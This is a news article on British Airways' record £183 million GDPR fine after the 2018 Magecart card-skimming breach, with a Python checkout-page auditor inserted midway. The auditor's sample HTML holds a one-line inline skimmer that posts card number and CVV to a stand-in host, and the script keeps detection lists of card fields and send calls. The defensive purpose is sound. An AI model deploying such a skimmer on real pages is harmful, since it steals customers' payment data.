British Airways Handed Record £183 Million GDPR Penalty

The UK GDPR supervisory authority has issued the largest ever GDPR financial penalty to date. British Airways has been fined £183 million ($229 million) for GDPR compliance failures related to last year’s cyberattack on its website.

While the financial penalty is high, it could have been considerably higher. The Information Commissioner's Office (ICO) has the authority to issue a financial penalty of up to €20 million or 4% of BA's global annual turnover. £183 million is just 1.5% of BA's global annual turnover for 2017.

The previous record fine was issued to Facebook over the Cambridge Analytica scandal, although the size of that fine was limited as the breach occurred prior to May 25, 2018 when the new GDPR came into effect.

The breach at BA occurred between August 21 and September 5, 2018. According to BA, the breach affected 380,000 booking transactions and resulted in the theft of customers’ names, addresses, bank card numbers, expiry dates, and CVV codes. The breach was reported to ICO within 24 hours of the breach occurring, well inside the 72-hour time limit of GDPR.

An analysis of the breach suggests the same threat actors that conducted the cyberattack on Ticketmaster in June were behind the attack: a threat group known as Magecart. Magecart specializes in skimming credit card details from unsecured website payment forms using an attack method called cross-site scripting. When visitors enter information on a compromised website, all information entered is captured.
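As an added defender's check (not from the original article or from BA), the script below audits a checkout page's HTML for the two footholds a Magecart-style skimmer relies on: third-party scripts loaded without Subresource Integrity, and inline scripts that read card fields and send them somewhere. The first-party origin, field names and sample HTML are constructed assumptions.

```python
"""Audit a checkout page for script tags a payment skimmer could hide in."""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Assumed first-party origin and the form fields a skimmer would target.
FIRST_PARTY = "checkout.example.com"
CARD_FIELDS = ("cardnumber", "cvv", "expiry")
SEND_CALLS = ("fetch(", "xmlhttprequest", "sendbeacon")


class ScriptAuditor(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_inline = False

    def handle_starttag(self, tag, attrs):
        if tag != "script":
            return
        a = dict(attrs)
        src = a.get("src")
        if src is None:            # inline script: inspect its body in handle_data
            self._in_inline = True
            return
        host = urlparse(src).hostname or FIRST_PARTY   # relative src is first-party
        if host != FIRST_PARTY and "integrity" not in a:
            self.findings.append(f"third-party script without SRI: {src}")

    def handle_data(self, data):
        body = data.lower()
        if self._in_inline and any(f in body for f in CARD_FIELDS) \
                and any(c in body for c in SEND_CALLS):
            self.findings.append("inline script reads card fields and sends data")

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_inline = False


def audit_checkout_page(html):
    """Return a list of human-readable findings for the given page HTML."""
    p = ScriptAuditor()
    p.feed(html)
    return p.findings


# Constructed sample: an SRI-pinned CDN script (fine), an unpinned
# third-party script, and an inline script that exfiltrates card fields.
SAMPLE = """<html><body>
<script src="https://checkout.example.com/app.js"></script>
<script src="https://cdn.example.net/lib.js" integrity="sha384-AAAA"></script>
<script src="https://cdn.third-party.example/stats.js"></script>
<form><input name="cardNumber"><input name="cvv"></form>
<script>document.forms[0].onsubmit=()=>{fetch('https://collect.example/',
 {method:'POST', body: cardNumber.value+cvv.value})}</script>
</body></html>"""

if __name__ == "__main__":
    for finding in audit_checkout_page(SAMPLE):
        print(finding)
```

Running it against the constructed sample reports the unpinned `stats.js` and the exfiltrating inline script, and nothing for the first-party or SRI-pinned scripts.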

BA has apologized to customers for the breach and has already agreed to cover losses suffered by customers. “British Airways responded quickly to a criminal act to steal customers’ data. We have found no evidence of fraud/fraudulent activity on accounts linked to the theft,” said BA chairman and chief executive, Alex Cruz.

BA has up to 28 days to launch an appeal against the GDPR penalty. “We intend to take all appropriate steps to defend the airline’s position vigorously, including making any necessary appeals,” said Willie Walsh, chief executive of International Airlines Group (IAG), the multi-national holding company with a majority stake in BA.
